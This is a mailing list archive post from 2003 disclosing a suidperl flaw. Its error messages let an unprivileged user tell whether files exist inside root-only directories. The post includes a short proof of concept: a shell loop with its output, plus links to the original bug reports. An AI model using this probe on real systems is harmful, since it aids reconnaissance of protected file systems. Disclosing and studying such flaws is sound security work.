lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200308270215.h7R2FuJ480542@milan.maths.usyd.edu.au>
From: psz at maths.usyd.edu.au (Paul Szabo)
Subject: suidperl path disclosure

suidperl can be used for path disclosure (to verify if a file exists
when the user has no access to the directories above). The error
messages returned by suidperl are too revealing: in the examples below
I expected a uniform 'permission denied' or similar.

Set things up as one user (e.g. root):

  # pwd
  /root/ptest
  # ls -al
  total 8
  drwx------    2 root     root         4096 Jul 30 09:36 .
  drwx------   13 root     root         4096 Jul 30 09:35 ..
  -rwx------    1 root     root            0 Jul 30 09:36 file
  -rws------    1 root     root            0 Jul 30 09:36 sfile

As another (normal) user, use suidperl to disclose path info:

  $ id
  uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),109(tutsols)
  $ for n in nosuch file sfile; do
  > echo ''; echo Test $n; suidperl /root/ptest/$n
  > done
  
  Test nosuch
  Can't open perl script "/root/ptest/nosuch": No such file or directory
  
  Test file
  Script is not setuid/setgid in suidperl
  
  Test sfile
  Permission denied.

I cannot immediately see how this could be used for a root compromise.

This problem was reported to perlbug@...l.com on 23 Mar 2001, see

  http://rt.perl.org/rt2/Ticket/Display.html?id=6511

and to submit@...s.debian.org on 30 Jul 2003, see

  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426

but is apparently not being worked on. Mis-quoting from that latter
reference:

  Bug has been reported a month (or two years) ago, but those uncaring,
  lazy people have done nothing.

Cheers,

Paul Szabo - psz@...hs.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ